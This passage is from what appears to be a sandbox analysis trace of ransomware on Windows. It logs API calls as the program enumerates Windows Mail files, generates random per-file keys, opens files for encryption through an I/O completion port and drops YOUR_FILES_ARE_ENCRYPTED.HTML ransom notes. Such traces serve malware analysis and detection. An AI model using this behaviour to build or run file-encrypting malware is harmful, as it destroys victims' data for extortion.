lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.693] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.693] lstrlenW (lpString=".log") returned 4 [0170.693] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.694] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0170.694] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0170.694] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=2097152) returned 1 [0170.694] GetProcessHeap () returned 0x270000 [0170.694] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0170.697] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="FF") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="26") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="5B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="08") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="25") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="DB") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="B3") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="00") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="EC") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="C2") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="60") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="4A") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="4D") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="CB") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="11") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="3B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="ED") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="77") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4F") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="4B") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="EA") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="60") returned 2 [0170.697] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="1F") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="B1") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="DE") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="14") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C1") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="44") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9D") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="24") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="EC") returned 2 [0170.698] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="30") returned 2 [0170.699] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" [0170.699] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.699] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0170.699] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827deb8e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x206000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0170.699] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore") returned 95 [0170.699] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.699] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.700] lstrlenW (lpString=".MSMessageStore") returned 15 [0170.700] PathFindExtensionW (pszPath="WindowsMail.MSMessageStore") returned=".MSMessageStore" [0170.700] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0170.700] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0170.700] lstrcmpW (lpString1="WindowsMail.pat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.700] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.700] lstrlenW (lpString=".pat") returned 4 [0170.702] PathFindExtensionW (pszPath="WindowsMail.pat") returned=".pat" [0170.702] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82d13bb7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x60, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0170.702] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0170.702] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0170.708] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0170.710] CloseHandle (hObject=0x5b0) returned 1 [0170.710] GetProcessHeap () returned 0x270000 [0170.710] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa008 | out: hHeap=0x270000) returned 1 [0170.710] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb4b0c0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="new", cAlternateFileName="")) returned 0 [0170.711] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.711] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0170.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0170.711] WriteFile (in: hFile=0x604, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0170.713] CloseHandle (hObject=0x604) returned 1 [0170.714] GetProcessHeap () returned 0x270000 [0170.714] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0170.714] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb24f60, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb24f60, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb450ab7c, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0170.714] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0170.714] lstrcmpW (lpString1="edb.chk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.714] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0170.714] lstrlenW (lpString=".chk") returned 4 [0170.714] PathFindExtensionW (pszPath="edb.chk") returned=".chk" [0170.714] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcb71220, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcb71220, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb450ab7c, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb.log", cAlternateFileName="")) returned 1 [0170.715] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0170.715] lstrcmpW (lpString1="edb.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.715] PathFindExtensionW (pszPath="edb.log") returned=".log" [0170.715] lstrlenW (lpString=".log") returned 4 [0170.715] PathFindExtensionW (pszPath="edb.log") returned=".log" [0170.715] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x604 [0170.715] GetFileSizeEx (in: hFile=0x604, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0170.715] GetProcessHeap () returned 0x270000 [0170.715] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0170.716] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="FF") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="47") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="18") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="22") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="85") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="47") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="99") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="5D") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="A8") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="8A") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="A1") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="21") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="7E") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="38") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="23") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="A5") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="F2") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="07") returned 2 [0170.716] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="48") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="B6") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="6A") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="29") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="C3") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="F8") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="96") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="D0") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="61") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="51") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="97") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="A4") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="05") returned 2 [0170.717] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="44") returned 2 [0170.717] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" [0170.717] CreateIoCompletionPort (FileHandle=0x604, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.718] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0170.718] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0170.718] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.718] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.718] lstrlenW (lpString=".log") returned 4 [0170.718] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0170.718] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0170.718] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2097152) returned 1 [0170.718] GetProcessHeap () returned 0x270000 [0170.718] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78c1008 [0170.723] wsprintfW (in: param_1=0x4ebd41e, param_2="%02X" | out: param_1="23") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd422, param_2="%02X" | out: param_1="FF") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd426, param_2="%02X" | out: param_1="22") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd42a, param_2="%02X" | out: param_1="78") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd42e, param_2="%02X" | out: param_1="37") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd432, param_2="%02X" | out: param_1="9E") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd436, param_2="%02X" | out: param_1="B9") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd43a, param_2="%02X" | out: param_1="89") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd43e, param_2="%02X" | out: param_1="E1") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd442, param_2="%02X" | out: param_1="C9") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd446, param_2="%02X" | out: param_1="4A") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd44a, param_2="%02X" | out: param_1="BD") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd44e, param_2="%02X" | out: param_1="07") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd452, param_2="%02X" | out: param_1="66") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd456, param_2="%02X" | out: param_1="00") returned 2 [0170.723] wsprintfW (in: param_1=0x4ebd45a, param_2="%02X" | out: param_1="1D") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd45e, param_2="%02X" | out: param_1="DA") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd462, param_2="%02X" | out: param_1="67") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd466, param_2="%02X" | out: param_1="1D") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd46a, param_2="%02X" | out: param_1="57") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd46e, param_2="%02X" | out: param_1="CE") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd472, param_2="%02X" | out: param_1="91") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd476, param_2="%02X" | out: param_1="78") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd47a, param_2="%02X" | out: param_1="9E") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd47e, param_2="%02X" | out: param_1="D4") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd482, param_2="%02X" | out: param_1="BB") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd486, param_2="%02X" | out: param_1="A1") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd48a, param_2="%02X" | out: param_1="B2") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd48e, param_2="%02X" | out: param_1="B1") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd492, param_2="%02X" | out: param_1="79") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd496, param_2="%02X" | out: param_1="CB") returned 2 [0170.724] wsprintfW (in: param_1=0x4ebd49a, param_2="%02X" | out: param_1="35") returned 2 [0170.725] lstrcpyW (in: lpString1=0x78d10bc, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" [0170.725] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x78c1008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.725] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78c1008, lpOverlapped=0x78c1008) returned 1 [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81d74b3a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0170.725] lstrcmpW (lpString1="edbres00001.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0170.725] lstrlenW (lpString=".jrs") returned 4 [0170.725] PathFindExtensionW (pszPath="edbres00001.jrs") returned=".jrs" [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x81f89e7e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0170.725] lstrcmpW (lpString1="edbres00002.jrs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0170.725] lstrlenW (lpString=".jrs") returned 4 [0170.725] PathFindExtensionW (pszPath="edbres00002.jrs") returned=".jrs" [0170.725] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcad8ca0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcad8ca0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859db9ea, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x60, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0170.725] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0170.725] lstrcmpW (lpString1="oeold.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.725] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0170.725] lstrlenW (lpString=".xml") returned 4 [0170.725] PathFindExtensionW (pszPath="oeold.xml") returned=".xml" [0170.725] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0170.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0170.726] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=260) returned 1 [0170.726] CloseHandle (hObject=0x5b8) returned 1 [0170.726] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcafee00, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x85b0c4ec, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0170.726] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 68 [0170.726] GetProcessHeap () returned 0x270000 [0170.726] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0170.726] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") 